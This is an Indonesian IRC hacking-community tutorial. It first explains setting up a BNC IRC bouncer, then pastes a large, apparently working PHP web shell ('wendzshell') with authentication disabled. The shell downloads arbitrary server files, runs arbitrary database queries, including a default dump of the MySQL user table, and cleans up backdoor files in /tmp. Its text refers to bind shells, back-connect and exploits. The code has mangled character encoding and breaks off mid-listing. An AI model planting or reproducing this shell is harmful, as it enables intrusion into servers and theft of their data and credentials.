TUTORIAL HACKING

KOMUNITAS #SOLOHACKERLINK
ALLnet + Dalnet

7
Kumpulan tutorial ini kami persembahkan bagi anda yang ingin belajar Hacking,
Defacing, Cracking, dan yang berhubungan dengan dunia Komputer.

Tapi Ingat Kami Tidak Bertanggung Jawab Atas Penyalah Gunaan Artikel Ini.

-ChanServ- Channel: #solohackerlink

-ChanServ- Founder: PeNcOpEt_CiNtA, last seen: 5 days (0h 40m 1s) ago
-ChanServ- Successor: POM_PONK << ONLINE >>
-ChanServ- Registered: 2 years 24 weeks 2 days (1h 31m 55s) ago (2003)
-ChanServ- Last Used: 0 seconds ago
-ChanServ- Topic: [ www.solohackerlink.cool.to Kirimkan tutorial k-mu disini ]
Selamat Menunaikan Ibadah Syaum

-ChanServ- Email: solohackerlink@gmail.com

-ChanServ- Url: www.solohackerlink.s.to atau www.solohackerlink.cool.to

-ChanServ- Options: TopicLock, SecureOps, Private, SplitOps, Verbose

-ChanServ- Mode Lock: -i

Membuat BNC

BNC ialah sebuah software untuk koneksi ke mIRC memakai IP shell, sebenarnya hampir
sama dengan proxy, karena sama-sama memakai ip lain dan kelebihan BNC daripada
proxy dia bisa dibuat vhost yang cantik-cantik…

Menginstall BNC

1. wget http://www.igm.web.id/tcl/bnc.tgz

2. tar -zxvf bnc.tgz

3. cd bnc

4. ./configure

edit file bnc.conf

...........................................

S: ini adalah password admin

D:7000:5 ini password untuk connect ; 7000 adalah port connect ke bnc; 5 max userbnc
W:1 bila di set 1 ident akan tetap, bila 0 ident berubah
A:1:* host yang di ijinkan memakai bnc ini ; * artinya semua host bisa memakai irc ini
X: default host
V: pilihan host
..........................

S:...... (isi password)

D:.... :.... : ....
W:1
A:1:*
X: ali.paling.cakep.sedua.be
V: ali.paling.cakep.sedua.be

kalo sudah selesai di edit jalankan perintah :

./bnc bnc.conf

Menjalankan BNC nya…

1. Buka program chat mirc

2. Ketik /server ali.paling.cakep.sedunia.be 7000 (7000 : port bnc anda)

3. Ketik /quote pass

4. Ketik /quote vip

5. Pilih vhost anda dengan cara /quote vip ali.paling.cakep.sedunia.be

6. Masuk ke irc server dengan cara /quote conn irc.cbn.net.id

7. Welcome to AllNetwork – Join #IGM

8. silahkan pake dan join ke channel kesukaanmu

-------------------------------
diambil dari artikel : http://ali.asnawi.or.id/?page_id=78
------------------------------
salam
Comex

Post by : Comex on [ 10 April 2006 22:41:02 ]

Injecttion Manteb neh ^_^

######## mulai ###########

<?php
// Г ГГЎГ Г ГїГГ ГЄГ | Language
// $language=´ru´ - ГГ іГГ ГЄГЁГ (r ussian)
// $language=´eng´ - english (Г ГГ ЈГГ ЁГГ ГЄГЁ Г)
$language=´eng´;

// ГЂГіГІГҐГГ ІГЁГґГЁГЄГ ГГЁ Гї | Authentification

// $auth = 1; - ГЂГіГІГҐГГ ІГЁГґГЁГЄГ Г ГЁГї ГўГЄГ ГѕГГҐГ Г ( authentification = On )
// $auth = 0; - ГЂГіГІГҐГГ ІГЁГґГЁГЄГ Г ГЁГї ГўГ ГЄГГѕГГҐ ГГ ( a uthentification = Off )
$auth = 0;

// Г ГГЈ ГЁГ Г Ё ГЇГ Г ГГ Гј ГГ Гї ГГ ГГ ІГіГЇГ ГЄ ГГЄГ ГЁ ГЇГІГі (Login &

Password for access)
// ГЌГ ГГ ЂГЃГГ Г њГГ Г ГЊГГЌ ГГГ њ ГЏГ ГђГГ
ГђГЂГГ ЊГ ГГ Г ЌГГ ГЊ ГЌГЂ ГГ ГђГГ ГђГ! !! (CHANGE THIS!!!)
$name=´wendz´; // ГГ ГЈГЁ Г ГЇГГГјГ Г Г ўГ ГІГҐГГї (user login)
$pass=´arnand´; // ГЇГ ГГГ Гј ГЇГГ ГјГГ Г ўГ ГІГҐГ Гї (user password)
/******************************************************************************************************/
error_reporting(0);
set_magic_quotes_runtime(0);
@set_time_limit(0);
@ini_set(´max_execution_time´,0);
@ini_set(´output_buffering´,0);
$safe_mode = @ini_get(´safe_mode´);
$version = "1.24";
if(version_compare(phpversion(), ´4.1.0´) == -1)
{
$_POST = &$HTTP_POST_VARS;
$_GET = &$HTTP_GET_VARS;
$_SERVER = &$HTTP_SERVER_VARS;
}
if (@get_magic_quotes_gpc())
{
foreach ($_POST as $k=>$v)
{
$_POST[$k] = stripslashes($v);
}
foreach ($_SERVER as $k=>$v)
{
$_SERVER[$k] = stripslashes($v);
}
}

if($auth == 1) {
if (!isset($_SERVER[´PHP_AUTH_USER´]) || $_SERVER[´PHP_AUTH_USER´]!==$name ||
$_SERVER[´PHP_AUTH_PW´]!==$pass)
{
header(´WWW-Authenticate: Basic realm="wendzshell"´);
header(´HTTP/1.0 401 Unauthorized´);
exit("<b><a href=http://rst.void.ru>wendzshell</a> : Access Denied</b>");
}
}
$head = ´<!-- Г ГГ Г Г ўГ ГІГўГіГ Г Г Г Гї -->
<html>
<head>
<title>wendzshell</title>
<SCRIPT language=JavaScript>
<!-- Hide this from older browsers
var typespeed = 200; // This is the amount of time between letters.
var MessagePause = 1000; // This is the amount of time that the full message stays visible.
var timerID = null;
var Running = false;
var message = new Array();
var currentMessage = 0;
var offset = 0;
message[0] = "wendz shell"
message[1] = "Use This Shell, For Education Purposes Only!"
message[2] = "Thank`s for RST"
message[3] = "Thank`s for all my friend"
message[4] = "Ripped by arnand aka wendz"
function Display() {
var text = message[currentMessage];
if (offset < text.length) {
if (text.charAt(offset) == " ")
offset++
var partMessage = text.substring(0, offset + 1);
document.title = partMessage;
offset++
timerID = setTimeout("Display()", typespeed);
Running = true;
} else {
offset = 0;
currentMessage++
if (currentMessage == message.length)
currentMessage = 0;
timerID = setTimeout("Display()", MessagePause);
Running = true;
}
}
function stop() {
if (Running)
clearTimeout(timerID);
Running = false
}
function start() {
stop();
Display();
}
start();
// end hide -->
</SCRIPT>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">

<STYLE>
tr {
BORDER-RIGHT: #aaaaaa 1px solid;
BORDER-TOP: #eeeeee 1px solid;
BORDER-LEFT: #eeeeee 1px solid;
BORDER-BOTTOM: #aaaaaa 1px solid;
}
td {
BORDER-RIGHT: #aaaaaa 1px solid;
BORDER-TOP: #eeeeee 1px solid;
BORDER-LEFT: #eeeeee 1px solid;
BORDER-BOTTOM: #aaaaaa 1px solid;
}
.table1 {
BORDER-RIGHT: #cccccc 0px;
BORDER-TOP: #cccccc 0px;
BORDER-LEFT: #cccccc 0px;
BORDER-BOTTOM: #cccccc 0px;
BACKGROUND-COLOR: #D4D0C8;
}
.td1 {
BORDER-RIGHT: #cccccc 0px;
BORDER-TOP: #cccccc 0px;
BORDER-LEFT: #cccccc 0px;
BORDER-BOTTOM: #cccccc 0px;
font: 7pt Verdana;
}
.tr1 {
BORDER-RIGHT: #cccccc 0px;
BORDER-TOP: #cccccc 0px;
BORDER-LEFT: #cccccc 0px;
BORDER-BOTTOM: #cccccc 0px;
}
table {
BORDER-RIGHT: #eeeeee 1px outset;
BORDER-TOP: #eeeeee 1px outset;
BORDER-LEFT: #eeeeee 1px outset;
BORDER-BOTTOM: #eeeeee 1px outset;
BACKGROUND-COLOR: #D4D0C8;
}
input {
BORDER-RIGHT: #ffffff 1px solid;
BORDER-TOP: #999999 1px solid;
BORDER-LEFT: #999999 1px solid;
BORDER-BOTTOM: #ffffff 1px solid;
BACKGROUND-COLOR: #e4e0d8;
font: 8pt Verdana;
}
select {
BORDER-RIGHT: #ffffff 1px solid;
BORDER-TOP: #999999 1px solid;
BORDER-LEFT: #999999 1px solid;
BORDER-BOTTOM: #ffffff 1px solid;
BACKGROUND-COLOR: #e4e0d8;
font: 8pt Verdana;
}
submit {
BORDER-RIGHT: buttonhighlight 2px outset;
BORDER-TOP: buttonhighlight 2px outset;
BORDER-LEFT: buttonhighlight 2px outset;
BORDER-BOTTOM: buttonhighlight 2px outset;
BACKGROUND-COLOR: #e4e0d8;
width: 30%;
}
textarea {
BORDER-RIGHT: #ffffff 1px solid;
BORDER-TOP: #999999 1px solid;
BORDER-LEFT: #999999 1px solid;
BORDER-BOTTOM: #ffffff 1px solid;
BACKGROUND-COLOR: #e4e0d8;
font: Fixedsys bold;
}
BODY {
margin-top: 1px;
margin-right: 1px;
margin-bottom: 1px;
margin-left: 1px;
}
A:link {COLOR:red; TEXT-DECORATION: none}
A:visited { COLOR:red; TEXT-DECORATION: none}
A:active {COLOR:red; TEXT-DECORATION: none}
A:hover {color:blue;TEXT-DECORATION: none}
</STYLE>´;
class zipfile
{
var $datasec = array();
var $ctrl_dir = array();
var $eof_ctrl_dir = "x50x4bx05x06x00x00x00x00";
var $old_offset = 0;
function unix2DosTime($unixtime = 0) {
$timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
if ($timearray[´year´] < 1980) {
$timearray[´year´] = 1980;
$timearray[´mon´] = 1;
$timearray[´mday´] = 1;
$timearray[´hours´] = 0;
$timearray[´minutes´] = 0;
$timearray[´seconds´] = 0;
}
return (($timearray[´year´] - 1980) << 25) | ($timearray[´mon´] << 21) | ($timearray[´mday´] << 16)
|
($timearray[´hours´] << 11) | ($timearray[´minutes´] << 5) | ($timearray[´seconds´] >> 1);
}
function addFile($data, $name, $time = 0)
{
$name = str_replace(´\´, ´/´, $name);
$dtime = dechex($this->unix2DosTime($time));
$hexdtime = ´x´ . $dtime[6] . $dtime[7]
. ´x´ . $dtime[4] . $dtime[5]
. ´x´ . $dtime[2] . $dtime[3]
. ´x´ . $dtime[0] . $dtime[1];
eval(´$hexdtime = "´ . $hexdtime . ´";´);
$fr = "x50x4bx03x04";
$fr .= "x14x00";
$fr .= "x00x00";
$fr .= "x08x00";
$fr .= $hexdtime;
$unc_len = strlen($data);
$crc = crc32($data);
$zdata = gzcompress($data);
$zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
$c_len = strlen($zdata);
$fr .= pack(´V´, $crc);
$fr .= pack(´V´, $c_len);
$fr .= pack(´V´, $unc_len);
$fr .= pack(´v´, strlen($name));
$fr .= pack(´v´, 0);
$fr .= $name;
$fr .= $zdata;
$this -> datasec[] = $fr;
$cdrec = "x50x4bx01x02";
$cdrec .= "x00x00";
$cdrec .= "x14x00";
$cdrec .= "x00x00";
$cdrec .= "x08x00";
$cdrec .= $hexdtime;
$cdrec .= pack(´V´, $crc);
$cdrec .= pack(´V´, $c_len);
$cdrec .= pack(´V´, $unc_len);
$cdrec .= pack(´v´, strlen($name) );
$cdrec .= pack(´v´, 0 );
$cdrec .= pack(´v´, 0 );
$cdrec .= pack(´v´, 0 );
$cdrec .= pack(´v´, 0 );
$cdrec .= pack(´V´, 32 );
$cdrec .= pack(´V´, $this -> old_offset );
$this -> old_offset += strlen($fr);
$cdrec .= $name;
$this -> ctrl_dir[] = $cdrec;
}
function file()
{
$data = implode(´´, $this -> datasec);
$ctrldir = implode(´´, $this -> ctrl_dir);
return
$data .
$ctrldir .
$this -> eof_ctrl_dir .
pack(´v´, sizeof($this -> ctrl_dir)) .
pack(´v´, sizeof($this -> ctrl_dir)) .
pack(´V´, strlen($ctrldir)) .
pack(´V´, strlen($data)) .
"x00x00";
}
}
function compress(&$filename,&$filedump,$compress)
{
global $content_encoding;
global $mime_type;
if ($compress == ´bzip´ && @function_exists(´bzcompress´))
{
$filename .= ´.bz2´;
$mime_type = ´application/x-bzip2´;
$filedump = bzcompress($filedump);
}
else if ($compress == ´gzip´ && @function_exists(´gzencode´))
{
$filename .= ´.gz´;
$content_encoding = ´x-gzip´;
$mime_type = ´application/x-gzip´;
$filedump = gzencode($filedump);
}
else if ($compress == ´zip´ && @function_exists(´gzcompress´))
{
$filename .= ´.zip´;
$mime_type = ´application/zip´;
$zipfile = new zipfile();
$zipfile -> addFile($filedump, substr($filename, 0, -4));
$filedump = $zipfile -> file();
}
else
{
$mime_type = ´application/octet-stream´;
}
}
function mailattach($to,$from,$subj,$attach)
{
$headers = "From: $from ";
$headers .= "MIME-Version: 1.0 ";
$headers .= "Content-Type: ".$attach[´type´];
$headers .= "; name="".$attach[´name´]."" ";
$headers .= "Content-Transfer-Encoding: base64 ";
$headers .= chunk_split(base64_encode($attach[´content´]))." ";
if(@mail($to,$subj,"",$headers)) { return 1; }
return 0;
}
if(isset($_GET[´img´])&&!empty($_GET[´img´]))
{
$images = array();
$images[1]=
´R0lGODlhBwAHAIAAAAAAAP///yH5BAEAAAEALAAAAAAHAAcAAAILjI9pkODnYohUhQIAOw==
´;
$images[2]=
´R0lGODlhBwAHAIAAAAAAAP///yH5BAEAAAEALAAAAAAHAAcAAAILjI+pwA3hnmlJhgIAOw==´;

@ob_clean();
header("Content-type: image/gif");
echo base64_decode($images[$_GET[´img´]]);
die();
}
if(isset($_POST[´cmd´]) && !empty($_POST[´cmd´]) && $_POST[´cmd´]=="download_file" && !
empty($_POST[´d_name´]))
{
if(!$file=@fopen($_POST[´d_name´],"r")) { echo re($_POST[´d_name´]); $_POST[´cmd´]=""; }
else
{
@ob_clean();
$filename = @basename($_POST[´d_name´]);
$filedump = @fread($file,@filesize($_POST[´d_name´]));
fclose($file);
$content_encoding=$mime_type=´´;
compress($filename,$filedump,$_POST[´compress´]);
if (!empty($content_encoding)) { header(´Content-Encoding: ´ . $content_encoding); }
header("Content-type: ".$mime_type);
header("Content-disposition: attachment; filename="".$filename."";");
echo $filedump;
exit();
}
}
if(isset($_GET[´phpinfo´])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana
size=-2><b>[ <a href=".$_SERVER[´PHP_SELF´].">BACK</a> ]</b></font></div>"; die(); }
if ($_POST[´cmd´]=="db_query")
{
echo $head;
switch($_POST[´db´])
{
case ´MySQL´:
if(empty($_POST[´db_port´])) { $_POST[´db_port´] = ´3306´; }
$db = @mysql_connect(´localhost:´.$_POST[´db_port´],$_POST[´mysql_l´],$_POST[´mysql_p´]);
if($db)
{
if(!empty($_POST[´mysql_db´])) { @mysql_select_db($_POST[´mysql_db´],$db); }
$querys = @explode(´;´,$_POST[´db_query´]);
foreach($querys as $num=>$query)
{
if(strlen($query)>5){
echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query).
"</b></font><br>";
$res = @mysql_query($query,$db);
$error = @mysql_error($db);
if($error) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error :
<b>".$error."</b></font></td></tr></table><br>"; }
else {
if (@mysql_num_rows($res) > 0)
{
$sql2 = $sql = $keys = $values = ´´;
while (($row = @mysql_fetch_assoc($res)))
{
$keys = @implode(" </b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b> ",
@array_keys($row));
$values = @array_values($row);
foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);}
$values = @implode(" </font></td><td><font face=Verdana size=-2> ",$values);
$sql2 .= "<tr><td><font face=Verdana size=-2> ".$values." </font></td></tr>";
}
echo "<table width=100%>";
$sql = "<tr><td bgcolor=#cccccc><font face=Verdana size=-
2><b> ".$keys." </b></font></td></tr>";
$sql .= $sql2;
echo $sql;
echo "</table><br>";
}
else { if(($rows = @mysql_affected_rows($db))>=0) { echo "<table width=100%><tr><td><font
face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } }
}
@mysql_free_result($res);
}
}
@mysql_close($db);
}
else echo "<div align=center><font face=Verdana size=-2 color=red><b>Can´t connect to MySQL
server</b></font></div>";
break;
case ´MSSQL´:
if(empty($_POST[´db_port´])) { $_POST[´db_port´] = ´1433´; }
$db = @mssql_connect(´localhost,´.$_POST[´db_port´],$_POST[´mysql_l´],$_POST[´mysql_p´]);
if($db)
{
if(!empty($_POST[´mysql_db´])) { @mssql_select_db($_POST[´mysql_db´],$db); }
$querys = @explode(´;´,$_POST[´db_query´]);
foreach($querys as $num=>$query)
{
if(strlen($query)>5){
echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query).
"</b></font><br>";
$res = @mssql_query($query,$db);
if (@mssql_num_rows($res) > 0)
{
$sql2 = $sql = $keys = $values = ´´;
while (($row = @mssql_fetch_assoc($res)))
{
$keys = @implode(" </b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b> ",
@array_keys($row));
$values = @array_values($row);
foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);}
$values = @implode(" </font></td><td><font face=Verdana size=-2> ",$values);
$sql2 .= "<tr><td><font face=Verdana size=-2> ".$values." </font></td></tr>";
}
echo "<table width=100%>";
$sql = "<tr><td bgcolor=#cccccc><font face=Verdana size=-
2><b> ".$keys." </b></font></td></tr>";
$sql .= $sql2;
echo $sql;
echo "</table><br>";
}
/* else { if(($rows = @mssql_affected_rows($db)) > 0) { echo "<table width=100%><tr><td><font
face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } else
{ echo "<table width=100%><tr><td><font face=Verdana size=-2>Error :
<b>".$error."</b></font></td></tr></table><br>"; }} */
@mssql_free_result($res);
}
}
@mssql_close($db);
}
else echo "<div align=center><font face=Verdana size=-2 color=red><b>Can´t connect to MSSQL
server</b></font></div>";
break;
case ´PostgreSQL´:
if(empty($_POST[´db_port´])) { $_POST[´db_port´] = ´5432´; }
$str = "host=´localhost´ port=´".$_POST[´db_port´]."´ user=´".$_POST[´mysql_l´]."´ password=
´".$_POST[´mysql_p´]."´ dbname=´".$_POST[´mysql_db´]."´";
$db = @pg_connect($str);
if($db)
{
$querys = @explode(´;´,$_POST[´db_query´]);
foreach($querys as $num=>$query)
{
if(strlen($query)>5){
echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query).
"</b></font><br>";
$res = @pg_query($db,$query);
$error = @pg_errormessage($db);
if($error) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error :
<b>".$error."</b></font></td></tr></table><br>"; }
else {
if (@pg_num_rows($res) > 0)
{
$sql2 = $sql = $keys = $values = ´´;
while (($row = @pg_fetch_assoc($res)))
{
$keys = @implode(" </b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b> ",
@array_keys($row));
$values = @array_values($row);
foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);}
$values = @implode(" </font></td><td><font face=Verdana size=-2> ",$values);
$sql2 .= "<tr><td><font face=Verdana size=-2> ".$values." </font></td></tr>";
}
echo "<table width=100%>";
$sql = "<tr><td bgcolor=#cccccc><font face=Verdana size=-
2><b> ".$keys." </b></font></td></tr>";
$sql .= $sql2;
echo $sql;
echo "</table><br>";
}
else { if(($rows = @pg_affected_rows($res))>=0) { echo "<table width=100%><tr><td><font
face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } }
}
@pg_free_result($res);
}
}
@pg_close($db);
}
else echo "<div align=center><font face=Verdana size=-2 color=red><b>Can´t connect to
PostgreSQL server</b></font></div>";
break;
case ´Oracle´:
$db = @ocilogon($_POST[´mysql_l´], $_POST[´mysql_p´], $_POST[´mysql_db´]);
if(($error = @ocierror())) { echo "<div align=center><font face=Verdana size=-2
color=red><b>Can´t connect to Oracle server.<br>".$error[´message´]."</b></font></div>"; }
else
{
$querys = @explode(´;´,$_POST[´db_query´]);
foreach($querys as $num=>$query)
{
if(strlen($query)>5) {
echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query).
"</b></font><br>";
$stat = @ociparse($db, $query);
@ociexecute($stat);
if(($error = @ocierror())) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error :
<b>".$error[´message´]."</b></font></td></tr></table><br>"; }
else
{
$rowcount = @ocirowcount($stat);
if($rowcount != 0) {echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows :
<b>".$rowcount."</b></font></td></tr></table><br>";}
else {
echo "<table width=100%><tr>";
for ($j = 1; $j <= @ocinumcols($stat); $j++) { echo "<td bgcolor=#cccccc><font face=Verdana
size=-2><b> ".htmlspecialchars(@ocicolumnname($stat, $j))." </b></font></td>"; }
echo "</tr>";
while(ocifetch($stat))
{
echo "<tr>";
for ($j = 1; $j <= @ocinumcols($stat); $j++) { echo "<td><font face=Verdana size=-
2> ".htmlspecialchars(@ociresult($stat, $j))." </font></td>"; }
echo "</tr>";
}
echo "</table><br>";
}
@ocifreestatement($stat);
}
}
}
@ocilogoff($db);
}
break;
}
echo "<form name=form method=POST>";
echo in(´hidden´,´db´,0,$_POST[´db´]);
echo in(´hidden´,´db_port´,0,$_POST[´db_port´]);
echo in(´hidden´,´mysql_l´,0,$_POST[´mysql_l´]);
echo in(´hidden´,´mysql_p´,0,$_POST[´mysql_p´]);
echo in(´hidden´,´mysql_db´,0,$_POST[´mysql_db´]);
echo in(´hidden´,´cmd´,0,´db_query´);
echo "<div align=center><textarea cols=65 rows=10 name=db_query>".(!empty($_POST
[´db_query´])?($_POST[´db_query´]):("SHOW DATABASES; SELECT * FROM user;")).
"</textarea><br><input type=submit name=submit value=" Run SQL query "></div><br><br>";
echo "</form>";
echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER
[´PHP_SELF´].">BACK</a> ]</b></font></div>"; die();
}
if(isset($_GET[´delete´]))
{
@unlink(@substr(@strrchr($_SERVER[´PHP_SELF´],"/"),1));
}
if(isset($_GET[´tmp´]))
{
@unlink("/tmp/bdpl");
@unlink("/tmp/back");
@unlink("/tmp/bd");
@unlink("/tmp/bd.c");
@unlink("/tmp/dp");
@unlink("/tmp/dpc");
@unlink("/tmp/dpc.c");
}
if(isset($_GET[´phpini´]))
{
echo $head;
function U_value($value)
{
if ($value == ´´) return ´<i>no value</i>´;
if (@is_bool($value)) return $value ? ´TRUE´ : ´FALSE´;
if ($value === null) return ´NULL´;
if (@is_object($value)) $value = (array) $value;
if (@is_array($value))
{
@ob_start();
print_r($value);
$value = @ob_get_contents();
@ob_end_clean();
}
return U_wordwrap((string) $value);
}
function U_wordwrap($str)
{
$str = @wordwrap(@htmlspecialchars($str), 100, ´<wbr />´, true);
return @preg_replace(´!(&[^;]*)<wbr />([^;]*;)!´, ´$1$2<wbr />´, $str);
}
if (@function_exists(´ini_get_all´))
{
$r = ´´;
echo ´<table width=100%>´, ´<tr><td bgcolor=#cccccc><font face=Verdana size=-2
color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#cccccc><font
face=Verdana size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td
bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Master
Value</b></div></font></td></tr>´;
foreach (@ini_get_all() as $key=>$value)
{
$r .= ´<tr><td>´.ws(3).´<font face=Verdana size=-2><b>´.$key.´</b></font></td><td><font
face=Verdana size=-2><div align=center><b>´.U_value($value[´local_value´]).
´</b></div></font></td><td><font face=Verdana size=-2><div align=center><b>´.U_value($value
[´global_value´]).´</b></div></font></td></tr>´;
}
echo $r;
echo ´</table>´;
}
echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER
[´PHP_SELF´].">BACK</a> ]</b></font></div>";
die();
}
if(isset($_GET[´cpu´]))
{
echo $head;
echo ´<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-
2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>´;
$cpuf = @file("cpuinfo");
if($cpuf)
{
$c = @sizeof($cpuf);
for($i=0;$i<$c;$i++)
{
$info = @explode(":",$cpuf[$i]);
if($info[1]==""){ $info[1]="---"; }
$r .= ´<tr><td>´.ws(3).´<font face=Verdana size=-2><b>´.trim($info[0]).´</b></font></td><td><font
face=Verdana size=-2><div align=center><b>´.trim($info[1]).´</b></div></font></td></tr>´;
}
echo $r;
}
else
{
echo ´<tr><td>´.ws(3).´<div align=center><font face=Verdana size=-2><b> ---
</b></font></div></td></tr>´;
}
echo ´</table>´;
echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER
[´PHP_SELF´].">BACK</a> ]</b></font></div>";
die();
}
if(isset($_GET[´mem´]))
{
echo $head;
echo ´<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-
2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>´;
$memf = @file("meminfo");
if($memf)
{
$c = sizeof($memf);
for($i=0;$i<$c;$i++)
{
$info = explode(":",$memf[$i]);
if($info[1]==""){ $info[1]="---"; }
$r .= ´<tr><td>´.ws(3).´<font face=Verdana size=-2><b>´.trim($info[0]).´</b></font></td><td><font
face=Verdana size=-2><div align=center><b>´.trim($info[1]).´</b></div></font></td></tr>´;
}
echo $r;
}
else
{
echo ´<tr><td>´.ws(3).´<div align=center><font face=Verdana size=-2><b> ---
</b></font></div></td></tr>´;
}
echo ´</table>´;
echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER
[´PHP_SELF´].">BACK</a> ]</b></font></div>";
die();
}
$lang=array(
´ru_text1´ =>´Г Г ГЇГГГ ГҐГГ Г Гї ГЄГГГ ГГ Г ´,
´ru_text2´ =>´Г Г ГЇГГГ ГҐГГ ЁГҐ ГЄГГ Г Г Г ГГ ГГҐ ГГ ўГҐГГҐ ´,
´ru_text3´ =>´Г Г ГЇГГГ ГЁГІГј ГЄГГ Г Г Г Гі ´,
´ru_text4´ =>´ГђГ ГЎГГГ Гї ГГ ЁГГҐГЄГІГ Г Г ЁГї´,
´ru_text5´ =>´Г Г ГЈГГі ГГЄГ Г ґГ ГГ ГГ ў ГГ Г ГҐГ Г ўГҐГ ´,
´ru_text6´ =>´Г Г ГЄГ ГГјГГ Г Г ґГ ГГ ´,
´ru_text7´ =>´ГЂГГЁ Г ГГ´ ,
´ru_text8´ =>´Г Г ГЎГҐГГ ЁГІГҐ Г ГГ ЁГ Г´,
´ru_butt1´ =>´Г Г ГЇГ ГГ Г ЁГІГј´,
´ru_butt2´ =>´Г Г ГЈГ ГіГ ГЁГІГј´,
´ru_text9´ =>´ГЋГІГЄГГ ГІГЁГҐ ГЇГГ ГІГ Г Ё ГЇГГ ЁГўГїГГЄГ ГҐГЈГ ГЄ /bin/bash´,
´ru_text10´=>´ГЋГІГЄГГГІ Гј ГЇГГ ГІ´,
´ru_text11´=>´ГЏГ Г ГГ Гј ГГ Гї ГГ ГГІГ іГЇГ ´,
´ru_butt3´ =>´ГЋГІГЄГГ Г ІГј´,
´ru_text12´=>´back-connect´,
´ru_text13´=>´IP-Г ГГГҐ Г´ ,
´ru_text14´=>´ГЏГГ ГІ´,
´ru_butt4´ =>´Г Г ГЇГ ГГ Г ЁГІГј´,
´ru_text15´=>´Г Г ГЈГГ іГГЄГ Гґ Г ГГГ Гў Г Г іГГ Г ГҐ Г ГГ ГЈГ ГГҐ ГГ ўГҐГГ
´,
´ru_text16´=>´Г ГГЇГ Г Гј ГГ Г ўГ ГІГј´,
´ru_text17´=>´Г ГГ Г Г ҐГГ Г Г ГґГ Г Г´,
´ru_text18´=>´Г ГГЄГ Г Гј ГГ Г Г ґГ ГГ´ ,
´ru_text19´=>´Exploits´,
´ru_text20´=>´Г ГГЇГ Г Гј ГГ Г ўГ ГІГј´,
´ru_text21´=>´ГЌГ ГўГ ГҐ ГЁГГї´,
´ru_text22´=>´datapipe´,
´ru_text23´=>´Г ГГЄГ Г Гј ГГ Г ГЇГ Г ГІ´,
´ru_text24´=>´Г ГГ Г Г ҐГГ Г Г ГГ ГГІ´,
´ru_text25´=>´Г ГГ Г Г ҐГГ Г Г ГЇГГГІ ´,
´ru_text26´=>´Г ГГЇГ Г Гј ГГ Г ўГ ГІГј´,
´ru_butt5´ =>´Г Г ГЇГіГГ ІГЁГІГј´,
´ru_text28´=>´ГђГ ГЎГГІГ Г ў safe_mode´,
´ru_text29´=>´Г ГГ ГІГ іГЇ Г Г ГЇГГ ҐГ№ГҐГ´,
´ru_butt6´ =>´Г Г ГҐГГ ЁГІГј´,
´ru_text30´=>´ГЏГГ Г ГГ ГІГ ГґГ ГГ Г ´,
´ru_butt7´ =>´Г Г ГўГҐГ ГІГЁ´,
´ru_text31´=>´Г Г ГГ Г Г Ґ Г Г Г ГГҐ Г´,
´ru_text32´=>´Г ГГЇГ Г ГГ ҐГГЁ ГҐ PHP ГЄГ ГГ ´ ,
´ru_text33´=>´ГЏГГ Г ўГҐГ ГЄГ ГўГГ Г ГГГ ГГ ГІГ Ё ГГ ЎГГ Г Г Г ГЈ Г Г
ГГЁ ГГ ҐГГЁ Г open_basedir ГГҐ ГГҐГ Г ґГіГГЄГГ ЁГЁ cURL´,
´ru_butt8´ =>´ГЏГГ ГўГҐГ ГЁГІГј´,
´ru_text34´=>´ГЏГГ Г ўГҐГ ГЄГ ГўГГ Г ГГГ ГГ ГІГ Ё ГГ ЎГГ Г Г Г ГЈ Г Г
ГГЁ ГГ ҐГГЁ Г safe_mode ГГҐГ ГҐГ ГґГіГГЄГ Г ЁГѕ include´,
´ru_text35´=>´ГЏГГ Г ўГҐГ ГЄГ ГўГГ Г ГГГ ГГ ГІГ Ё ГГ ЎГГ Г Г Г ГЈ Г Г
ГГЁ ГГ ҐГГЁ Г safe_mode ГГҐГ ГҐГ Г Г ГЈГГ іГГЄГ і ГґГ ГГ Г Г ў mysql´,
´ru_text36´=>´ГЃГ Г Г ´,
´ru_text37´=>´Г ГГЈГЁ Г´ ,
´ru_text38´=>´ГЏГ Г ГГ Гј ´,
´ru_text39´=>´Г Г ГЎГГ ЁГГ ´,
´ru_text40´=>´Г Г ГГЇ ГІГ ГЎГГ ЁГГ ГЎГ ГГ Г Г Г ГГ Г ´,
´ru_butt9´ =>´Г Г ГГЇ ´,
´ru_text41´=>´Г ГГ ГГ ГГ ЁГІГј Гў ГґГ ГГ ГҐ ´,
´ru_text42´=>´ГђГҐГГ ГЄГІГ ЁГГ Г ўГ ГГ ЁГҐ ГґГ ГГГ ´,
´ru_text43´=>´ГђГҐГГ ГЄГІГ ЁГГ Г ўГ ГІГј ГґГ Г Г´,
